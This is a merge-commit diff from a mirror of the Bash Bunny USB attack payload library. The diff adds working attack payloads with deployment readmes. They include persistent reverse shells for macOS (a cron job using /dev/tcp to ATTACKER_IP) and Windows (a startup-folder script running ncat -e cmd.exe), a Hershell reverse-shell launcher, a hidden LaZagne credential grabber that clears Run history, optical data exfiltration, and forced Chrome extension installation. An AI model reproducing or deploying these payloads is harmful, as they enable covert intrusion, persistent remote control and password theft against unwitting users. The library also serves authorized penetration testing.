hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

pull/340/head
root 2018-05-07 09:35:47 -05:00
parent d978800874 65d652a15c
commit e984278d66
28 changed files with 704 additions and 99 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@ -1,6 +1,6 @@
# Payload Library for the Bash Bunny by Hak5
![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny")
![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png)
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
* [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki")

14
languages/de.json Normal file → Executable file
View File

@ -17,6 +17,7 @@
"__comment":" ",
"__comment":"A = LeftShift + a, { = LeftShift + [",
"__comment":" ",
"__comment":"German umlauts added by Simon Dankelmann",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
@ -165,5 +166,14 @@
"|":"40,00,64",
"COMMAND-CTRL-SHIFT":"40,00,64",
"COMMAND-CTRL":"40,00,64",
"COMMAND-OPTION-SHIFT'":"40,00,64"
}
"COMMAND-OPTION-SHIFT'":"40,00,64",
"ß":"00,00,2d",
"€":"40,00,08",
"§":"02,00,20",
"ä":"00,00,34",
"ö":"00,00,33",
"ü":"00,00,2f",
"Ä":"02,00,34",
"Ö":"02,00,33",
"Ü":"02,00,2f"
}

27
payloads/extensions/debug.sh Normal file
View File

@ -0,0 +1,27 @@
#!/bin/bash
################################################################################
# Allow Debugging messages written to: "/root/udisk/debug/[session].txt"
# on the BashBunny
#
# How this works?
# 1) Example Command: DEBUG "switch-1-debug" "Hello from debug extension!"
# 2) After bashing, text can be read at: "/root/udisk/debug/[session].txt"
# on the BashBunny
################################################################################
function DEBUG() {
session=$1
message=$2
timestamp () {
echo "$(date +"%Y-%m-%d_%H-%M-%S")"
}
mkdir -p /root/udisk/debug/
debug_file="/root/udisk/debug/${session}.txt"
[[ -f "${debug_file}" ]] || echo "$(timestamp): DEBUG STARTED" >> "${debug_file}"
echo "$(timestamp): ${message}" >> ${debug_file}
}
export -f DEBUG

10
payloads/extensions/get.sh
View File

@ -19,11 +19,11 @@ function GET() {
;;
"TARGET_OS")
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
[[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return
[[ $ScanForOS == *"Linux"* ]] && export TARGET_OS='LINUX' && return
[[ $ScanForOS == *"Apple"* ]] && export TARGET_OS='MACOS' && return
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1 -v2)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O $TARGET_IP --osscan-guess -v2)
[[ "${ScanForOS,,}" == *"windows"* ]] && export TARGET_OS='WINDOWS' && return
[[ "${ScanForOS,,}" == *"apple"* ]] && export TARGET_OS='MACOS' && return
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
export TARGET_OS='UNKNOWN'
;;
esac

39
payloads/extensions/mac_happy.sh
View File

@ -1,26 +1,29 @@
#!/bin/bash
#Title: Mac_Happy
# Title: Mac_Happy
# Author: thehappydinoa
# Target: Mac
# Version: 0.1
# Target: macOS
# Version: 0.3
#
# Makes Mac happy by correctly setting pid and vid
# Use by running mac_happy ATTACKMODE HID <attack modes here>
# Use by running MAC_HAPPY HID/ETHERNET/...
#
function mac_happy() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
for i in $*;
do
command=$(echo $command $i)
done
command=$(echo $command VID_0X05AC PID_0X021E)
eval $command
function MAC_HAPPY() {
[[ "$#" -gt 1 ]] || exit 1
case "$1" in
HID)
ATTACKMODE HID vid_0x05ac pid_0x021e
;;
ETHERNET)
ATTACKMODE ECM_ETHERNET vid_0x05ac pid_0x021e
;;
ATTACKMODE)
eval "$@ vid_0x05ac pid_0x021e"
;;
*)
exit 1
;;
esac
}
export -f mac_happy
export -f MAC_HAPPY

17
payloads/extensions/wait.sh Normal file
View File

@ -0,0 +1,17 @@
#!/bin/bash
#
# WAIT v1 by @Hak5Darren
# Waits blocks the payload from continuing until the switch position has changed
# Usage: WAIT
function WAIT() {
GET SWITCH_POSITION
TEST=$SWITCH_POSITION
while true
do GET SWITCH_POSITION
if [ $SWITCH_POSITION != $TEST ]; then break; fi
sleep 1
done
}
export -f WAIT

4
payloads/library/credentials/PasswordGrabber/d.cmd
View File

@ -1,4 +0,0 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit

24
payloads/library/credentials/PasswordGrabber/e.cmd
View File

@ -1,24 +0,0 @@
@echo off
@echo Installing Windows Update
setlocal
cd /d %~dp0
REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul
REM This executes LaZagne in the current directory and outputs the password file to Loot
%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit

1
payloads/library/credentials/PasswordGrabber/i.vbs
View File

@ -1 +0,0 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

5
payloads/library/credentials/PasswordGrabber/payload.ps1 Normal file
View File

@ -0,0 +1,5 @@
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

38
payloads/library/credentials/PasswordGrabber/payload.txt
View File

@ -1,19 +1,33 @@
#!/bin/bash
#
# Title: Password Grabber
# Author: Razerblade
# Version: 1.2
# Target: Windows
# Props: Hak5Darren, TeCHemically, dragmus31
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
# Author: jdebetaz
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
# Version: 1.1
# Category: Credentials
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn steals credentials by using LaZagne and saves them to /Loot
#
# Target: Windows
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
LED FINISH
######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
######## ATTACK ########
LED ATTACK
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until passwords are grabbed.
sleep 10
######## FINISH ########
LED FINISH

49
payloads/library/credentials/PasswordGrabber/readme.md
View File

@ -1,40 +1,35 @@
# PasswordGrabber
* Author: RazerBlade
* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
* Version: Version 1.2
* Firmware support: 1.1+
* Target: Windows 7+
* Author: [jdebetaz](https://github.com/jdebetaz)
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade
* Version: 1.3
* Frimware support: 1.1 and higher
* Target version: Windows 7 and higher
## Description
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
Full read here: https://github.com/AlessandroZ/LaZagne
Downloads here: https://github.com/AlessandroZ/LaZagne/releases
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
## Configuration
1. You need to download the latest file from LaZagnes release page.
2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
3. Plug it in a computer and PWN them.
1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases).
2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe
3. Plug your BashBunny and Enjoy
Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
## INFO
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
## Info
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
## DISCLAIMER
Hak5 is not responsible for the execution of 3rd party binaries.
## STATUS
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red | Attack Setup |
| Green | Attack Complete |
## Disclaimer
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
## Discussion
[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
## Led status
| LED | Status |
|-----------------------------------------------|--------|
| Magenta solid | Setup |
| Yellow single blink | Attack |
| Green 1000ms VERYFAST blink followed by SOLID | Finish |

26
payloads/library/exfiltration/optical-exfiltration/index.min.html Normal file
View File

File diff suppressed because one or more lines are too long

68
payloads/library/exfiltration/optical-exfiltration/payload.txt Executable file
View File

@ -0,0 +1,68 @@
#!/bin/bash
#
# Title: Optical Exfiltration
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: *NIX
# Attackmodes: HID
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
#
# Quick HID only attack to write an HTML/JS file to target machine
# and open a browser, to exfiltrate data Using QR Codes and a video
# recording device.
#
# Optional html params:
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
#
# playback: Passing the string "finish" to this param will auto-play the results,
# when QR codes finish rendering.
#
# Example:
# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing HTML |
# | FINISH | Browser Ready/Processing |
#
ATTACKMODE HID
LED SETUP
target_html=\~\/index.html
RUN UNITY xterm
Q DELAY 1000
Q STRING rm "$target_html"
Q ENTER
Q DELAY 500
Q STRING vi "$target_html"
Q ENTER
Q DELAY 1000
Q STRING i
LED ATTACK
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
source_html=$payload_dir/index.min.html
while IFS= read data
do
if [ "${data}" = " " ]
then
Q SPACE
else
Q STRING "$data"
fi
done < "$source_html"
Q ESC
Q STRING :x
Q ENTER
Q STRING firefox "$target_html"
Q ENTER
LED FINISH

15
payloads/library/general/InfiniteControl/payload.txt
View File

@ -26,6 +26,13 @@ ATTACKMODE HID
INFINITE_KEY=CTRL
#INFINITE_KEY=BREAK
# Setting MAX_SECONDS will utilize random value
# else leave blank, "MAX_SECONDS=", to use
# FIXED_SECONDS value every time.
# 300 == 5min
MAX_SECONDS=300
FIXED_SECONDS=9
# infinite while loop
while true
do
@ -33,7 +40,13 @@ do
QUACK $INFINITE_KEY
sleep 1
LED ATTACK
sleep 9
# Slight change from original to support "random"
# delays between key presses.
if [ ! -z MAX_SECONDS ]; then
sleep $(($RANDOM % $MAX_SECONDS))
else
sleep $FIXED_SECONDS
fi
done
# this code will never be reached

55
payloads/library/prank/ncage/osx.txt Normal file
View File

@ -0,0 +1,55 @@
REM Title: Chrome Extension Installer
REM Author: audibleblink
DELAY 1000
REM Open Extension URL
GUI SPACE
DELAY 500
STRING chrome
DELAY 500
ENTER
DELAY 4000
GUI l
DELAY 200
STRING https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol
DELAY 500
ENTER
DELAY 3000
REM Open the JavaScript console in the browser
REM GUI-ALT j doesn't work, so we have to do it the long way
CTRL F2
DELAY 100
STRING v
DELAY 100
DOWNARROW
DELAY 100
STRING d
DELAY 100
RIGHTARROW
DELAY 100
STRING j
DELAY 100
ENTER
DELAY 3000
REM Use jQuery to click the Install button
STRING $("div[role='button']").click()
ENTER
DELAY 2000
REM Confirm the installation
REM Depends on a MacOS setting that allows tabbing through dialogs
SHIFT TAB
DELAY 300
SPACE
DELAY 4000
REM Close the tabs you just opened
GUI w
DELAY 300
GUI w

44
payloads/library/prank/ncage/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
# ATTENTION: Requires newest firmware with newest extensions
# Installs the ncage (or any) Google Chrome extension
# using jquery which is kindly supplied by the app store.
## Status
# | LED | Status |
# | --------- | ----------- |
# | Magenta Solid | Setting up |
# | Blue Blinking | Attacking |
# | Green | Finished |
# | Red | Failed |
## Setup
LED SETUP
ATTACKMODE AUTO_ETHERNET ETHERNET_TIMEOUT_10
GET TARGET_OS
GET SWITCH_POSITION
LED ATTACK
case "$TARGET_OS" in
WINDOWS)
ATTACKMODE HID
QUACK ${SWITCH_POSITION}/win.txt
LED FINISH
;;
MACOS)
MAC_HAPPY ATTACKMODE HID
QUACK ${SWITCH_POSITION}/osx.txt
LED FINISH
;;
*)
DEBUG "ncage" "OS Not Detected"
LED FAIL2
;;
esac

26
payloads/library/prank/ncage/readme.md Normal file
View File

@ -0,0 +1,26 @@
# nCage
Author: audibleblink
Version: 2.0
## Description
ATTENTION: Requires newest firmware (1.5+) with newest extensions
Installs the ncage (or any) Google Chrome extension
using jquery which is kindly supplied by the app store.
## Configuration
* Configure each ducky.{win,osx} file to your liking
## Requirements
Just plug and play
## Status
| LED | Status |
| --------- | ----------- |
| Magenta Solid | Setting up |
| Blue Blinking | Attacking |
| Green | Finished |

35
payloads/library/prank/ncage/win.txt Normal file
View File

@ -0,0 +1,35 @@
REM Title: Chrome Extension Installer
REM Author: audibleblink
DELAY 3000
REM Open Extension URL
GUI r
DELAY 600
STRING chrome https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol
DELAY 200
ENTER
DELAY 8000
REM Open the JavaScript console in the browser
CTRL-SHIFT j
DELAY 4000
REM Use jQuery to click the Install button
STRING $("div[role='button']").click()
ENTER
DELAY 2000
REM Confirm the installation
TAB
DELAY 300
SPACE
DELAY 5000
REM Close the tabs you just opened
CTRL w
DELAY 300
CTRL w

14
payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md Normal file
View File

@ -0,0 +1,14 @@
# Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
Author: m3t4lk3y<br>
Creds: Ronan Kervella (Creator of Hershell)<br>
Version: Version 0.5<br>
## Instructions
Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
1. Compile all payloads and place binaries in the `payloads\$SWITCH_POSITION` directory (Double check binary names. Defaults are `mac32`, `linux32`, `win32.exe`)
2. Uncomment desired target OS payload lines and ensure others are commented out
3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. `ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343`)
4. Execute attack via Bash Bunny

118
payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt Normal file
View File

@ -0,0 +1,118 @@
#!/bin/bash
# Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
# Author: m3t4lk3y
# Version: 0.5
# Target: Windows, Mac OSX, Linux
# Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
# Instructions:
# Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
# 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
# 2. Uncomment desired target OS payload lines and ensure others are commented out
# 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
# 4. Execute attack via Bash Bunny
# SETUP
DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny
LED R
GET SWITCH_POSITION # Gets switch position (e.g. switch2)
ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial
# Modified RUN helper
function RUN() {
local os=$1
shift
[[ -z "$os" || -z "$*" ]] && exit 1
case "$os" in
WIN)
QUACK GUI m
QUACK DELAY 500
QUACK GUI r
QUACK DELAY 500
QUACK STRING cmd.exe
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 100
QUACK ENTER
;;
OSX)
QUACK GUI SPACE
QUACK DELAY 100
QUACK STRING terminal
QUACK DELAY 100
QUACK ENTER
QUACK GUI t
QUACK DELAY 100
QUACK STRING /bin/bash
QUACK DELAY 100
QUACK ENTER
QUACK STRING "$@"
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
QUACK STRING "exit"
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
QUACK STRING "exit"
QUACK DELAY 100
QUACK ENTER
;;
UNITY)
QUACK ALT F2
QUACK DELAY 1000
QUACK STRING xterm
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 1000
QUACK STRING /bin/bash
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 500
QUACK STRING cd /media/'$USER'
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING "exit"
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING "exit"
QUACK DELAY 500
QUACK ENTER
;;
*)
exit 1
;;
esac
}
export -f RUN
# START Attack
LED Y
# [+] Mac - Uncomment the following lines to use:
# until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount
# LED Y FAST
# RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"
# [+] Linux - Uncomment the following lines to use:
until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
LED Y FAST
RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"
# [+] Windows - Uncomment the following lines to use:
# until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
# LED Y FAST
# RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"
# END
sleep 5
LED G
# shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)

44
payloads/library/remote_access/MacPersistentReverseShell/README.md Normal file
View File

@ -0,0 +1,44 @@
# Reverse Shell Mac for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.2
## Description
Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.
* Targets MacOS
* Connection can be closed and reconnected at any time
* Deploys in roughly 23 sec
* Works well with NetCat as the listener
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ---------------------------- |
| Purple | Setup |
| Amber (Single Blink) | Launching Terminal |
| Amber (Double Blink) | Creating cron job |
| White (Fast Blink) | Cleaning up |
| Green | Finished |
## Configuration and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from MacPersistentReverseShell to either switch folder
3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Unplug Bash Bunny and switch it to the position the payload is loaded on
6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
7. Unplug the Bash Bunny and go to attacker's machine
8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat)
* If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh)
* If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe.
9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
10. Once a bash shell prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post.

32
payloads/library/remote_access/MacPersistentReverseShell/payload.txt Normal file
View File

@ -0,0 +1,32 @@
# Title: Mac Persistent Reverse Shell
# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.2
# Category: Remote Access
# Target: MacOS
# Attackmodes: HID, Storage
# Sets attack modes and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
GET_SWITCH_POSITION
# Opens the terminal
LED STAGE1
RUN OSX terminal
Q DELAY 2000
# Makes a cron job that will run once every minute
Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab -
Q ENTER
Q DELAY 2000
LED CLEANUP
# Clears and kills the terminal to hide the evidence
Q STRING clear
Q ENTER
Q DELAY 500
Q STRING killall Terminal
Q ENTER
LED FINISH

6
payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md
View File

@ -16,10 +16,8 @@ Configuring this payload is pretty time-consuming, but it's worth it.
1. Download Trustedsec's Unicorn: https://github.com/trustedsec/unicorn and use it to generate a powershell attack script.
2. After you generate a powershell script, execute ```$ msfconsole -r unicorn.rc``` in the same directory in order to start the listener.
3. Transfer **payload.txt** to any of your switches, then open it.
4. Replace ```your_powershell_attack_here``` with the contents of your **powershell_attack.txt** file which was generated.
5. Put a **\\** (backslash) before each special character (**\,** **\"** **\'** **\:** **\;** **\(** **\)** **\[** **\]** **\+**).
6. Save the **payload.txt** file and eject Bash Bunny. You are good to go! Sessions will be opened in the metasploit's listener!
3. You can use [this software(unicorn bash bunny payload generator)](https://github.com/Prodicode/bash-bunny-unicorn-payload-generator) to generate a **payload.txt** from the **powershell_attack.txt**.
4. Transfer the **payload.txt** to one of the switches on the Bash Bunny. You're ready to go!
## Status

45
payloads/library/remote_access/WindowsPersistentReverseShell/README.md Normal file
View File

@ -0,0 +1,45 @@
# Windows Persistent Reverse Shell for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.1
## Description
Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.
* Targets Windows 10 (working on support for older versions)
* Connection can be closed and reconnected at any time
* Deploys in roughly 15-20 sec
* Works with NetCat
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ------------------------------ |
| Purple | Setup |
| Amber (Single Blink) | Installing and running scripts |
| Green | Finished |
## Installation and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from WindowsPersistentReverseShell to either switch folder
3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder.
4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny
6. Save the persistence.vbs file
7. Unplug Bash Bunny and switch it to the position the payload is loaded on
8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec)
9. Unplug the Bash Bunny and go to attacker's machine
10. Listen on the port you chose in the persistence.vbs file on NetCat
* Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs)
* If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory.
11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute)
12. Once a Windows cmd prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion

18
payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt Normal file
View File

@ -0,0 +1,18 @@
# Title: NetCat Reverse Shell Windows
# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.0
# Category: Remote Access
# Target: Windows 10
# Attackmodes: HID, Storage
#Sets attack mode and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

7
payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs Normal file
View File

@ -0,0 +1,7 @@
Dim ncShell
Set ncShell = WScript.CreateObject("WScript.shell")
Do while True:
ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
WScript.Sleep(60000)
loop

20
payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 Normal file
View File

@ -0,0 +1,20 @@
$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user = $env:UserName
$NetCatFile = $Drive + "payloads\switch1\ncat.exe"
$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs"
$DestinationFile1 = "C:\temp\ncat.exe"
$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs")
If ((Test-Path $DestinationFile1) -eq $false){
New-Item -ItemType File -Path $DestinationFile1 -Force
}
If ((Test-Path $DestinationFile2) -eq $false){
New-Item -ItemType File -Path $DestinationFile2 -Force
}
Copy-Item -Path $NetCatFile -Destination $DestinationFile1
Copy-Item -Path $PersistenceFile -Destination $DestinationFile2
Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
Start-Process cmd -ArgumentList "/c start persistence.vbs"